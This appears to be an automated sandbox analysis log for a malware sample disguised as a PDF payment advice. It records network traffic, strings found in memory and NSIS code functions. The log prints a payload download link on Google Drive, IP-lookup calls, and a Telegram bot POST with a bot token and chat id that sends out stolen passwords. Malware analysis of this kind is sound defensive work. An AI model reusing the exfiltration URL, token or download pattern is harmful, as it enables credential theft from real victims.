              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49739 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16Wlyd_Vqizy5l4oyBE1RXq9ib6gP2vmD HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=16Wlyd_Vqizy5l4oyBE1RXq9ib6gP2vmD&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: unknownHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1e448cf4571dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034998000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034BC7000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.00000000348BA000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034BA8000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.00000000349E8000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034B07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034998000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034BC7000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034810000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034BA8000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.00000000349E8000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034B07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034998000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034BC7000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034810000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034791000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.00000000348BA000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034BA8000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.00000000349E8000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034B07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2960541313.0000000036FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/7f
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2960541313.0000000036FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/V
              Source: PAYMENT ADVICE TT07180016-24_pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034828000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034998000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.00000000348BA000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034BA8000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.00000000349E8000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034B07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.00000000348BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034B07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000003.2136489225.00000000040AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2935639823.0000000004038000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2935964085.0000000005CD0000.00000004.00001000.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2935639823.0000000004072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16Wlyd_Vqizy5l4oyBE1RXq9ib6gP2vmD
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2935639823.0000000004072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16Wlyd_Vqizy5l4oyBE1RXq9ib6gP2vmDH
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000003.2183352064.00000000040AB000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2935639823.00000000040A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000003.2183352064.00000000040AB000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000003.2136489225.00000000040AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16Wlyd_Vqizy5l4oyBE1RXq9ib6gP2vmD&export=download
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2935639823.000000000408C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16Wlyd_Vqizy5l4oyBE1RXq9ib6gP2vmD&export=downloadj
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000003.2183352064.00000000040AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16Wlyd_Vqizy5l4oyBE1RXq9ib6gP2vmD&export=downloadtt
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2935639823.000000000408C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16Wlyd_Vqizy5l4oyBE1RXq9ib6gP2vmD&export=downloady
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000003.2183352064.00000000040AB000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2935639823.00000000040A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/q
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000003.2136489225.00000000040AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000003.2136489225.000000000409E000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000003.2136489225.00000000040AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000003.2136489225.000000000409E000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000003.2136489225.00000000040AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000003.2136489225.000000000409E000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000003.2136489225.00000000040AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000003.2136489225.00000000040AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000003.2136489225.00000000040AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000003.2136489225.00000000040AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000003.2136489225.00000000040AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
              Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
              Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.200.225:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49747 version: TLS 1.2
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 0_2_004052F3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052F3

              System Summary

              barindex
              Source: initial sampleStatic PE information: Filename: PAYMENT ADVICE TT07180016-24_pdf.exe
              Source: initial sampleStatic PE information: Filename: PAYMENT ADVICE TT07180016-24_pdf.exe
              Source: PAYMENT ADVICE TT07180016-24_pdf.exeStatic file information: Suspicious name
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004032A0
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 0_2_00404B300_2_00404B30
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 0_2_004070410_2_00407041
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 0_2_0040686A0_2_0040686A
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_004070414_2_00407041
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_0040686A4_2_0040686A
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_00404B304_2_00404B30
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_001643284_2_00164328
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_001666B84_2_001666B8
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_00168DA04_2_00168DA0
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_001659684_2_00165968
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_001619B84_2_001619B8
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_00165F904_2_00165F90
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_00162DD14_2_00162DD1
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3747C6384_2_3747C638
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3747CCA04_2_3747CCA0
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3747331A4_2_3747331A
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_374703AF4_2_374703AF
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_374778484_2_37477848
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3747E79F4_2_3747E79F
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3747DEE14_2_3747DEE1
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_37476EA04_2_37476EA0
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3747BD884_2_3747BD88
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3747B4EC4_2_3747B4EC
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3747CC914_2_3747CC91
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3747E3394_2_3747E339
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3747EBF74_2_3747EBF7
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3747DA894_2_3747DA89
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3747B9444_2_3747B944
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3747C1F24_2_3747C1F2
